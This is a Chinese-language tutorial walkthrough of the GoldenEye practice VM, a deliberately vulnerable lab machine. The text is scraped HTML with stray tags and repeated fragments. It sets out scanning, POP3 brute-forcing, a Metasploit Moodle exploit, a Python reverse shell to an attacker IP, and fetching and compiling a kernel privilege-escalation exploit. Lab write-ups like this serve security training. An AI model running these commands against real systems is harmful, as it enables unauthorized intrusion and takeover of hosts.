GoldenEye靶机渗透测试教学文档<\/h1>

靶机环境准备<\/h2>

下载靶机环境：https:\/\/cloud.189.cn\/t\/EZfQVfa2YNnm<\/li>
访问码：om4x<\/li>

使用VMware启动下载的虚拟机环境<\/li> <\/ol>

信息收集阶段<\/h2>

网络发现<\/h3>

查看本机IP信息：<\/p>

ifconfig
<\/span><\/span><\/code><\/pre><\/li>

扫描同网段存活主机：<\/p>
nmap -sn 192.168.137.0\/24
<\/span><\/span><\/code><\/pre><\/li>

发现靶机IP后，进行端口扫描：<\/p>
nmap -p- 192.168.137.32
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
详细扫描结果<\/h3>
发现开放端口：<\/p>

80端口：HTTP服务<\/li>
55006和55007端口：POP3服务（初始扫描未发现，需全端口扫描）<\/li>
<\/ul>
详细服务扫描：<\/p>
nmap -p55006,55007 192.168.137.32 -sS -sV -A -T5
<\/span><\/span><\/code><\/pre>Web渗透<\/h2>
初始访问<\/h3>

访问80端口HTTP服务<\/li>
发现登录页面，需要凭证<\/li>
查看页面源码，发现terminal.js文件<\/li>
从源码中解码得到密码：InvincibleHack3r<\/code><\/li>
尝试用户名：boris<\/code>和natalya<\/code>（注意小写）<\/li>
<\/ol>
成功登录组合：<\/p>

用户名：boris<\/code><\/li>
密码：InvincibleHack3r<\/code><\/li>
<\/ul>
邮箱服务渗透<\/h3>


使用hydra爆破POP3服务：<\/p>
echo -e 'boris\nnatalya'<\/span> >1.txt
<\/span><\/span>hydra -L 1.txt -P \/usr\/share\/wordlists\/fasttrack.txt 192.168.137.32 -s 55007<\/span> pop3
<\/span><\/span><\/code><\/pre><\/li>

爆破结果：<\/p>

natalya的密码：bird<\/code><\/li>
<\/ul>
<\/li>

使用nc连接POP3服务：<\/p>
nc 192.168.137.32 55007<\/span>
<\/span><\/span><\/code><\/pre><\/li>

查看邮件内容：<\/p>
user boris
pass secret1!
list
retr 1~3
<\/code><\/pre>
<\/li>

从natalya的邮件中获取重要信息：<\/p>

新用户凭证：

用户名：xenia<\/code><\/li>
密码：RCP90rulez!<\/code><\/li>
<\/ul>
<\/li>
内部域名：severnaya-station.com\/gnocertdir<\/code><\/li>
需要修改hosts文件：
echo "192.168.137.32 severnaya-station.com"<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
CMS渗透<\/h3>


访问severnaya-station.com\/gnocertdir<\/code><\/p>
<\/li>

使用获取的凭证登录：<\/p>

用户名：xenia<\/code><\/li>
密码：RCP90rulez!<\/code><\/li>
<\/ul>
<\/li>

识别CMS信息：<\/p>

Moodle 2.2.3版本<\/li>
使用whatweb进行指纹识别<\/li>
<\/ul>
<\/li>

爆破另一个用户：<\/p>

用户名：doak<\/code><\/li>
密码：goat<\/code><\/li>
<\/ul>
<\/li>

查看doak的邮箱获取更多凭证：<\/p>

用户名：admin<\/code><\/li>
密码：xWinter1995x!<\/code>（通过图片隐写获取）<\/li>
<\/ul>
<\/li>
<\/ol>
图片隐写分析<\/h3>


下载网页中的可疑图片：<\/p>
wget http:\/\/severnaya-station.com\/gnocertdir\/someimage.jpg
<\/span><\/span><\/code><\/pre><\/li>

使用工具分析：<\/p>
binwalk someimage.jpg
<\/span><\/span>exiftool someimage.jpg
<\/span><\/span>strings someimage.jpg
<\/span><\/span><\/code><\/pre><\/li>

从图片描述中获取base64编码信息，解码得到admin密码<\/p>
<\/li>
<\/ol>
漏洞利用<\/h2>
Moodle 2.2.3 RCE漏洞利用<\/h3>


漏洞信息：CVE-2013-3630<\/p>
<\/li>

使用Metasploit框架：<\/p>
msfconsole
<\/span><\/span>search moodle
<\/span><\/span>use exploit\/unix\/webapp\/moodle_upload
<\/span><\/span>show options
<\/span><\/span>set RHOSTS 192.168.137.32
<\/span><\/span>set TARGETURI \/gnocertdir
<\/span><\/span>set USERNAME admin
<\/span><\/span>set PASSWORD xWinter1995x!
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre><\/li>

获取shell后提升交互性：<\/p>
python -c 'import pty; pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
替代方法：Python反弹shell<\/h3>


在Web界面找到命令执行点<\/p>
<\/li>

使用Python反弹shell代码：<\/p>
python -<\/span>c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机IP",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["\/bin\/sh","-i"]);'<\/span>
<\/span><\/span><\/code><\/pre><\/li>

在攻击机开启监听：<\/p>
nc -lvnp 6666<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
权限提升<\/h2>


检查系统信息：<\/p>
uname -a
<\/span><\/span><\/code><\/pre><\/li>

查找本地提权漏洞：<\/p>

发现可利用的exp：37292<\/li>
在Kali中搜索：
searchsploit 37292<\/span>
<\/span><\/span>cp \/usr\/share\/exploitdb\/exploits\/linux\/local\/37292.c \/tmp\/
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

在攻击机搭建HTTP服务：<\/p>
python -m SimpleHTTPServer 8080<\/span>
<\/span><\/span><\/code><\/pre><\/li>

在靶机下载并编译exp：<\/p>
cd \/tmp
<\/span><\/span>wget http:\/\/攻击机IP:8080\/37292.c
<\/span><\/span>cc -o exp 37292.c
<\/span><\/span>chmod +x exp
<\/span><\/span>.\/exp
<\/span><\/span><\/code><\/pre><\/li>

验证提权：<\/p>
id
<\/span><\/span>ls -al \/root
<\/span><\/span>cat \/root\/flag.txt
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
关键点总结<\/h2>

信息收集要全面，包括全端口扫描<\/li>
源码分析可能泄露关键信息<\/li>
服务爆破时注意用户名大小写<\/li>
邮件内容常包含重要线索<\/li>
图片隐写是常见的信息隐藏方式<\/li>
已知漏洞利用是获取系统访问的有效途径<\/li>
提权前需充分了解目标系统环境<\/li>
<\/ol>
免责声明<\/h2>
本教学文档仅供学习网络安全技术使用，未经授权请勿对任何计算机系统进行渗透测试。实际操作需获得目标系统所有者明确许可，违法使用造成的后果由使用者自行承担。<\/p>

GoldenEye靶机渗透测试教学文档<\/h1>

信息收集阶段<\/h2>

Web渗透<\/h2>

漏洞利用<\/h2>

免责声明<\/h2> 本教学文档仅供学习网络安全技术使用，未经授权请勿对任何计算机系统进行渗透测试。实际操作需获得目标系统所有者明确许可，违法使用造成的后果由使用者自行承担。<\/p>

免责声明<\/h2>
本教学文档仅供学习网络安全技术使用，未经授权请勿对任何计算机系统进行渗透测试。实际操作需获得目标系统所有者明确许可，违法使用造成的后果由使用者自行承担。<\/p>